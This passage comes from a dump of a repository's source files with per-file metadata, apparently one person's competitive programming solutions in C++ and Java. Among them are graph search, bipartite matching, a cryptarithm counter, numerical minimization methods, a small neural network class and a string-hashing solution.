tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\n//printAns\nvoid printAnswerAndExit(string a){printf(\"%s\\n\", a.data());exit(0);}\n//Igorjan\n\n#define N 2002\nint n, k, s, t;\nint count[N];\nint parent[N];\nint available[N][N];\nbool g[N][N];\nchar ss[N];\n\nvoid setAvailable(int from, int p, int u)\n{\n if (available[u][from] != -1)\n return;\n available[u][from] = p;\n fori(n)\n if (g[i][u])\n setAvailable(from, u, i);\n};\n\nvoid run()\n{\n scanf(\"%d%d%d%d\\n\", &n, &k, &s, &t);--s;--t;\n fori(n) forj(n) available[i][j] = -1;\n vi a(k);\n fori(k)\n scanf(\"%d\", &a[i]);\n fori(n)\n {\n available[i][i] = i;\n scanf(\"%s\", ss);\n forj(n)\n {\n g[i][j] = ss[j] == '1';\n if (g[i][j])\n available[i][j] = j;\n }\n }\n if (find(whole(a), t + 1) == a.end())\n a.pb(t + 1),++k;\n if (find(whole(a), s + 1) != a.end())\n a.erase(find(whole(a), s + 1)), --k;\n for (int& x: a)--x;\n vector<int> answer;\n vector<bool> used(n, false);\n vector<pii> nodes;\n\n function<void(int)> dfs = [&](int u)\n {\n if (nodes.size() == 0)\n return;\n\n forj(nodes.size())\n {\n int i = nodes[j].second;\n if (i == u)\n return;\n int v = u;\n while (v != i)\n {\n answer.pb(v),\n v = available[v][i];\n }\n u = i;\n }\n };\n\n\tfor (int i = 0; i < n; i++)\n\t\tfor (int u = 0; u < n; u++) {\n\t\t int j = available[u][i];\n\t\t if (j != -1)\n\t\t for (int v = 0; v < n; v++)\n\t\t if (available[i][v] != -1 && available[u][v] == -1)\n\t\t available[u][v] = j;\n\t\t}\n //fori(n)\n //forj(n)\n //printf(\"%d %d %d\\n\", i, j, 
available[i][j]);\n //return;\n\t\n fori(n)\n for (int v : a)\n count[i] += available[i][v] != -1;\n if (count[s] != k)\n printAnswerAndExit(\"NO\");\n count[s] = 0;\n for (int v : a)\n nodes.pb({count[v], v});\n nodes.pb({0, t});\n sort(nodes.rbegin(), nodes.rend());\n int l = nodes.size();\n fori(l)\n if (nodes[i].first < l - i - 1)\n printAnswerAndExit(\"NO\");\n\n dfs(s);\n if (answer.size() == 0 || answer.back() != t)\n answer.pb(t);\n\n vector<bool> isAnswerOk(n, true);\n for (int x : a)\n isAnswerOk[x] = false;\n isAnswerOk[t] = false;\n for (int x : answer)\n if (x >= 0 && x < n)\n isAnswerOk[x] = true;\n else\n printAnswerAndExit(\"NO\");\n int ok = accumulate(whole(isAnswerOk), 0);\n if (ok != n)\n printAnswerAndExit(\"NO\");\n\n printf(\"YES\\n\");\n printf(\"%d\\n\", answer.size());\n fori(answer.size())\n printf(\"%d \", answer[i] + 1);\n printf(\"\\n\");\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti 
istream&operator>>(istream&is,valarray<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5517473220825195, "alphanum_fraction": 0.5678763389587402, "avg_line_length": 21.25, "blob_id": "9f6a882cb8bed0bc0eaf98c248b0a1c2cd215dd0", "content_id": "ef0bbd429109ffe80cee090e2708483eab041bd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 83, "num_lines": 64, "path": "/study/task7/ArtificialNeuralNetwork.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.io.Serializable;\r\nimport java.util.Random;\r\n\r\npublic class ArtificialNeuralNetwork implements Serializable {\r\n\r\n\tstatic Random rand;\r\n\tprivate static final long serialVersionUID = 10L;\r\n\tprivate final static double c = 1;\r\n\tint in, out;\r\n\tint n;\r\n\tLayer[] layers;\r\n\tdouble[] ans;\r\n\tdouble[][] error;\r\n\r\n\tpublic static void writeln(double[] a) {\r\n\t\tfor (int i = 0; i < a.length; i++)\r\n\t\t\tSystem.out.printf(\"%6.3f \", a[i]);\r\n\t\tSystem.out.println();\r\n\t}\r\n\r\n\tstatic void writeln(Object o) {\r\n\t\tSystem.out.println(o);\r\n\t}\r\n\r\n\tpublic ArtificialNeuralNetwork(int... 
layerSizes) {\r\n\t\tn = layerSizes.length - 1;\r\n\t\tlayers = new Layer[n];\r\n\t\tin = layerSizes[0];\r\n\t\tout = layerSizes[n];\r\n\t\tans = new double[out + 1];\r\n\t\terror = new double[n + 1][];\r\n\t\terror[n] = new double[out + 1];\r\n\t\tfor (int i = 0; i < n; i++)\r\n\t\t\tlayers[i] = new Layer(layerSizes[i], layerSizes[i + 1]);\r\n\t}\r\n\r\n\tvoid get(Digit digit) {\r\n\t\tans = digit.getSignal();\r\n\t\tfor (int i = 0; i < n; i++) {\r\n\t\t\tans = layers[i].output(ans);\r\n\t\t}\r\n\t}\r\n\r\n\tpublic void add(Digit digit) {\r\n\t\tget(digit);\r\n\t\tfor (int i = 0; i < out; i++)\r\n\t\t\terror[n][i] = -((i != digit.label ? 0 : c) - ans[i]);// * ans[i] * (1 - ans[i]);\r\n\t\tfor (int i = n - 1; i >= 0; --i)\r\n\t\t\terror[i] = layers[i].getError(error[i + 1]);\r\n\t}\r\n\r\n\tpublic int getArgMax(Digit digit) {\r\n\t\tget(digit);\r\n\t\tdouble max = 0;\r\n\t\tint index = 0;\r\n\t\tfor (int i = 0; i < out; i++)\r\n\t\t\tif (ans[i] > max)\r\n\t\t\t\tmax = ans[index = i];\r\n\t\treturn index;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.40635642409324646, "alphanum_fraction": 0.41713961958885193, "avg_line_length": 24.550724029541016, "blob_id": "4f0cf1501041515d0a4c1bb717f6f7fb784d9f7b", "content_id": "f4ace997b96179edcc28a652a30eadf2d1cf88ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1762, "license_type": "no_license", "max_line_length": 110, "num_lines": 69, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/M.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nconst double EPS = 1e-9;\nconst int INF = 1e9;\n 
\ntypedef long long ll;\ntypedef long double ld;\ntypedef vector<int> vi;\n \nstruct tri\n{\n int row, col, bal;\n tri(int bal, int row, int col)\n {\n this->bal = bal;\n this->row = row;\n this->col = col;\n }\n};\n \nint main() {\n// freopen(\"in.in.c\", \"r\", stdin);\n// freopen(TASKNAME\".out\", \"w\", stdout);\n int n;\n cin >> n;\n vector<string> s(n);\n getline(cin, s[0]);\n fori(n)\n getline(cin, s[i]);\n vector<stack<tri> > a(27);\n int balance = 0;\n fori(n)\n forj(s[i].size())\n switch (s[i][j]) {\n case ' ' :\n break;\n case '{' : {\n balance++;\n break;\n }\n case '}' : {\n fori(26)\n if (a[i].size() && a[i].top().bal == balance)\n a[i].pop();\n balance--;\n break;\n }\n default :\n if (a[s[i][j] - 'a'].size())\n printf(\"%d:%d: warning: shadowed declaration of %c, the shadowed position is %d:%d\\n\",\n i + 1, j + 1, s[i][j], a[s[i][j] - 'a'].top().row, a[s[i][j] - 'a'].top().col);\n a[s[i][j] - 'a'].push(tri(balance, i + 1, j + 1));\n }\n return 0;\n}" }, { "alpha_fraction": 0.3849765360355377, "alphanum_fraction": 0.4017437994480133, "avg_line_length": 17.860759735107422, "blob_id": "8e1262e319ebc8a5f9798217dd843e2cb9857cfa", "content_id": "651433ceec70b29f7b7404771323ae646e988aaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1491, "license_type": "no_license", "max_line_length": 41, "num_lines": 79, "path": "/trash/lab_da_smthng/minimax/Dcune.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nvector< vector<int> > edges;\nvector<int> d;\nvector<bool> used;\nint n, m, k;\n\nbool dfs(int v, int m)\n{\n if (used[v])\n return false;\n used[v] = true;\n for (int i = 1; i <= n; i++)\n {\n if (edges[v][i] < m)\n continue;\n if (d[i] == -1 || dfs(d[i], m))\n {\n d[i] = v;\n return true;\n }\n }\n return false;\n}\n\nint ans(int m)\n{\n 
d.clear();\n d.resize(n + 1, -1);\n int c = 0;\n for (int i = 1; i <= n; i++)\n {\n used.clear();\n used.resize(n + 1, false);\n if (dfs(i, m))\n c++;\n }\n return c;\n}\n\nint main()\n{\n freopen(\"minimax.in\", \"r\", stdin);\n freopen(\"minimax.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n edges.resize(n + 1);\n int x, mx = -1, mn = 1000000001;\n for (int i = 1; i <= n; i++)\n {\n edges[i].resize(n + 1);\n for (int j = 1; j <= n; j++)\n scanf(\"%d\", &edges[i][j]),\n mx = max(mx, edges[i][j]),\n mn = min(mn, edges[i][j]);\n scanf(\"\\n\");\n }\n int l = mn, r = mx, m;\n while (l < r)\n {\n if (l == r - 1)\n {\n ans(r) >= n ? m = r : m = l;\n break;\n }\n m = (r + l) / 2;\n ans(m) >= n ? l = m : r = m;\n }\n printf(\"%d\\n\", m);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n\n" }, { "alpha_fraction": 0.4630891680717468, "alphanum_fraction": 0.4758659899234772, "avg_line_length": 23.45833396911621, "blob_id": "cec8f6f6268bef58c842105c20425a8857f6d524", "content_id": "8155f300c866af977fc385a6d4064c77c7ceca99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3522, "license_type": "no_license", "max_line_length": 125, "num_lines": 144, "path": "/Ann/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n\nusing namespace std;\n\nstatic const double eps = 0.05, delta = 0.01;\nstatic const double l = 1., r = 1.5;\n\ndouble f(double x)\n{\n return pow(x, 7) / 7 - pow(x, 3) + x * x / 2 - x;\n}\n\ndouble ff(double x)\n{\n return pow(x, 6) - 3 * pow(x, 2) + x - 1;\n}\n\ndouble fff(double x)\n{\n return 6 * pow(x, 5) - 6 * x + 1;\n}\n\ndouble passiveSearch()\n{\n double x = l, val = l;\n double mn = f(x), temp;\n int countOfOperations = 0;\n double start = clock();\n while (x <= r)\n {\n countOfOperations++;\n temp = f(x);\n if (temp < mn)\n mn = temp,\n val = x;\n x += eps;\n }\n cout << \"count of operations = \" << countOfOperations << endl << 
\"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return val;\n}\n\ndouble dihotomia()\n{\n double c, d, a = l, b = r;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n c = a + (b - a) / 2 - delta / 2;\n d = a + (b - a) / 2 + delta / 2;\n if (f(c) >= f(d))\n a = c;\n else\n b = d;\n }\n while (b - a > 2 * eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return a + (b - a) / 2;\n}\n\ndouble fi()\n{\n double c, d, a = l, b = r;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n c = a + (3 - sqrt(5)) * (b - a) / 2;\n d = b - (3 - sqrt(5)) * (b - a) / 2;\n if (f(c) >= f(d))\n a = c;\n else\n b = d;\n }\n while (b - a > 2 * eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return a + (b - a) / 2;\n}\n\ndouble tangents()\n{\n double c, d, a = l, b = r;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n c = (f(b) - f(a) + ff(a) * a - ff(b) * b) / (ff(a) - ff(b));\n if (ff(c) >= 0)\n b = c;\n else\n a = c;\n }\n while (b - a > 2 * eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return c;\n}\n\ndouble newton()\n{\n double xk, xprev = 0;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n xk = xprev - ff(xprev) / fff(xprev);\n xprev = xk;\n }\n while (fabs(ff(xk)) > eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return xk;\n}\n\ndouble chord()\n{\n double xk, xprev = r, xprevprev = l;\n int countOfOperations = 0;\n double start = clock();\n do\n {\n countOfOperations++;\n xk = xprev - (xprev - xprevprev) * ff(xprev) / (ff(xprev) - ff(xprevprev));\n xprevprev = xprev;\n 
xprev = xk;\n }\n while (fabs(ff(xk)) > eps);\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return xk;\n}\n\nint main()\n{\n cout << \"passiveSearch:\\n\" << passiveSearch() << endl << endl;\n cout << \"dihotomia:\\n\" << dihotomia() << endl << endl;\n cout << \"gold:\\n\" << fi() << endl << endl;\n cout << \"tangents:\\n\" << tangents() << endl << endl;\n cout << \"newton:\\n\" << newton() << endl << endl;\n cout << \"chord:\\n\" << chord() << endl << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.5399588346481323, "alphanum_fraction": 0.5581579208374023, "avg_line_length": 32.97311782836914, "blob_id": "859d1f9c0f3792eed66c9b89ed53f0ae7c16c9c3", "content_id": "4713ef6bd12bb9637a0f5445a2de0bbfdca74f81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6319, "license_type": "no_license", "max_line_length": 203, "num_lines": 186, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.12.16/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 December 2014\n#include <bits/stdc++.h>\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n\n#define fst first\n#define cnd second\n#define pb push_back\n#define ll long long\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int> >\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n\n#define argmax(a) max_element(whole(a)) - (a).begin()\n#define argmin(a) 
min_element(whole(a)) - (a).begin()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> inline void writeln (Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void readln (Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void read (Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void print (Head& head, Tail&... tail);\ntemplate <class Type1, class Type2> inline void print (pair<Type1, Type2>& p);\ntemplate <class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>& p);\ntemplate <class Head, class... Tail> inline void print_no_space(Head& head, Tail&... tail);\nvoid inline writeln() {printf(\"\\n\");}\nvoid inline writeln2(){printf(\"\\n\");}\nvoid inline readln() {}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nvoid run()\n{\n int n;\n readln(n);\n vector<string> s(n);\n readln(s);\n set<char> st;\n fori(n)\n forj(s[i].size())\n st.insert(s[i][j]);\n int m = st.size();\n vi a(10);\n fori(10)\n a[i] = i;\n int answer = 0;\n map<char, int> mp;\n int counter = 0;\n forit(i, st)\n mp[*i] = counter++;\n map<ll, bool> sol;\n vector<vi > d(n, vi(10, -1));\n fori(n)\n forj(s[i].size())\n d[i][10 - s[i].size() + j] = mp[s[i][j]];\n vector<bool> cant(10, false);\n fori(n)\n cant[mp[s[i][0]]] = true;\n vi ans(10);\n ll q;\n int p, cur;\n bool f, can;\n do\n {\n ans.clear();\n ans.resize(10, 0);\n q = a[0];\n fori1(m)\n q = (q * 10) + a[i];\n can = false;\n fori(10)\n can |= a[i] == 0 && cant[i];\n if (sol.find(q) == sol.end() && !can)\n {\n p = 0;\n ROF(j, 9, 0)\n {\n cur = p;\n fori(n - 1)\n if (d[i][j] != -1)\n cur += a[d[i][j]];\n ans[j] = cur % 10;\n p = cur / 10;\n }\n f = p 
== 0;\n forj(10)\n f &= ans[j] == a[d[n - 1][j]] || d[n - 1][j] == -1 && ans[j] == 0;\n if (f)\n answer++; \n }\n sol[q] = 1;\n }\n while (next_permutation(whole(a)));\n writeln(answer);\n}\n\nint main()\n{\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninline void print(double a){printf(\" \" DOUBLEFORMAT,a);}\ninline void print(int a){printf(\" %d\",a);}\ninline void print(const char* a){printf(\" %s\",a);}\ninline void print(string a){printf(\" %s\",a.c_str());}\ninline void print(long long a){printf(\" %lld\",a);}\ninline void print(long a){printf(\" %ld\",a);}\ninline void print(unsigned long a){printf(\" %ld\",a);}\ninline void print(unsigned int a){printf(\" %d\",a);}\ninline void print(char a){printf(\" %c\",a);}\ninline void print_no_space(double a){printf(DOUBLEFORMAT, a);}\ninline void print_no_space(int a){printf(\"%d\", a);}\ninline void print_no_space(const char* a){printf(\"%s\", a);}\ninline void print_no_space(string a){printf(\"%s\", a.c_str());}\ninline void print_no_space(long a){printf(\"%ld\", a);}\ninline void print_no_space(long long a){printf(\"%lld\", a);}\ninline void print_no_space(unsigned long a){printf(\"%ld\", a);}\ninline void print_no_space(unsigned int a){printf(\"%d\", a);}\ninline void print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type> inline void print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type> inline void print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print_no_space(vector<vector<Type> >&a){for(int 
i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\n\ntemplate<class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>&a){print_no_space(a.first); writeln2(a.second);}\ntemplate<class Type1, class Type2> inline void print(pair<Type1, Type2>& a) {print_no_space(a.first); writeln2(a.second);}\n\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\ninline void read(double &a){scanf(\"%lf\",&a);}\ninline void read(int &a){scanf(\"%d\",&a);}\ninline void read(string &a){cin>>a;}\ninline void read(long long &a){scanf(\"%lld\",&a);}\ninline void read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2> inline void read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type> inline void read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail> inline void readln(Head& head,Tail&... 
tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.5961904525756836, "alphanum_fraction": 0.6137565970420837, "avg_line_length": 36.79999923706055, "blob_id": "5455bfef7f451c5c393437f3442bf9a539d3aaf4", "content_id": "044f1b131103118e5c3fa97fa75667580b6dee11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4725, "license_type": "no_license", "max_line_length": 203, "num_lines": 125, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.11.18/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 17 November 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"binary\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> inline void readln(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void read(Head& head, Tail&... tail);\ntemplate <class Head, class... Tail> inline void print(Head& head, Tail&... 
tail);\ntemplate <class Type1, class Type2> inline void print(pair<Type1, Type2>& p);\ntemplate <class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>& p);\ntemplate <class Head, class... Tail> inline void print_no_space(Head& head, Tail&... tail);\nvoid inline writeln(){printf(\"\\n\");}void inline writeln2(){printf(\"\\n\");}void inline readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nint m, k;\n\nvoid run()\n{\n readln(m);\n int n = 0;\n for (; (1 << n) < m; n++);\n k = (1 << n) - m;\n n--;\n for(int i = 0; i < k; ++i, printf(\"\\n\"))\n for (int l = n - 1; l >= 0; l--)\n printf(\"%d\", (i & (1 << l)) != 0);\n for(int i = k; i < m; ++i, printf(\"\\n\"))\n for (int l = n; l >= 0; l--)\n printf(\"%d\", ((i + k) & (1 << l)) != 0);\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ninline void print(double a){printf(\" \" DOUBLEFORMAT,a);}\ninline void print(int a){printf(\" %d\",a);}\ninline void print(string a){printf(\" %s\",a.c_str());}\ninline void print(long long a){printf(\" %lld\",a);}\ninline void print(unsigned long a){printf(\" %ld\",a);}\ninline void print(unsigned int a){printf(\" %d\",a);}\ninline void print(char a){printf(\" %c\",a);}\ninline void print_no_space(double a){printf(DOUBLEFORMAT, a);}\ninline void print_no_space(int a){printf(\"%d\", a);}\ninline void print_no_space(string a){printf(\"%s\", a.c_str());}\ninline void print_no_space(long long a){printf(\"%lld\", a);}\ninline void print_no_space(unsigned long a){printf(\"%ld\", a);}\ninline void print_no_space(unsigned int a){printf(\"%d\", a);}\ninline void print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type> inline void print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void 
print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type> inline void print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type> inline void print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\n\ntemplate<class Type1, class Type2> inline void print_no_space(pair<Type1, Type2>&a){print_no_space(a.first); writeln2(a.second);}\ntemplate<class Type1, class Type2> inline void print(pair<Type1, Type2>& a) {print_no_space(a.first); writeln2(a.second);}\n\ntemplate <class Head, class... Tail> inline void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail> inline void writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\ninline void read(double &a){scanf(\"%lf\",&a);}\ninline void read(int &a){scanf(\"%d\",&a);}\ninline void read(string &a){cin>>a;}\ninline void read(long long &a){scanf(\"%lld\",&a);}\ninline void read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2> inline void read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type> inline void read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail> inline void readln(Head& head,Tail&... 
tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.35684749484062195, "alphanum_fraction": 0.36219897866249084, "avg_line_length": 22.626436233520508, "blob_id": "4522a8f80665571e7d3c5818493de83cae861685", "content_id": "0c7399810f1c1f2b21d0cf5d23b04563c707076e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4111, "license_type": "no_license", "max_line_length": 81, "num_lines": 174, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/J.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.util.Map.Entry;\nimport java.io.*;\nimport java.math.BigInteger;\n \npublic class J {\n FastScanner in;\n PrintWriter out;\n final String taskName = null;\n \n class Pair {\n int n, r;\n \n Pair(int r) {\n this.n = 1;\n this.r = r;\n }\n }\n \n long p = 31;\n \n Pair ans(char[] str, long[] pow, long[] h, int n, int m, int s) {\n Map<Long, Pair> q = new HashMap<Long, Pair>(n);\n \n for (int r = m - 1; r < n; r++) {\n int l = r - m + 1;\n \n long sum = h[r];\n if (l > 0) {\n sum -= h[l - 1];\n }\n \n sum = (sum * pow[n - l]);\n \n Pair cur = q.get(sum);\n \n if (cur == null) {\n q.put(sum, new Pair(l));\n } else {\n ++cur.n;\n cur.r = l;\n }\n \n // System.out.println(new String(str).substring(l, r + 1) + \" \" +\n // sum);\n \n }\n \n Pair ans = null;\n \n for (Entry<Long, Pair> e : q.entrySet()) {\n if (e.getValue().n >= s && (ans == null || e.getValue().r > ans.r)) {\n ans = e.getValue();\n }\n }\n \n return ans;\n }\n \n public void solve() {\n int m;\n while ((m = in.nextInt()) != 0) {\n char[] str = in.nextLine().toCharArray();\n int n = str.length;\n \n long[] pow = new long[n + 1];\n pow[0] = p;\n for (int i = 1; i <= n; i++) {\n pow[i] = (pow[i - 1] * p) ;\n }\n \n long[] h = new long[n];\n \n h[0] = (p * (str[0] - 'a' + 1)) ;\n \n for (int i = 1; i < n; i++) {\n h[i] = (pow[i] * (str[i] - 'a' + 1) + h[i - 1]) ;\n }\n \n // 
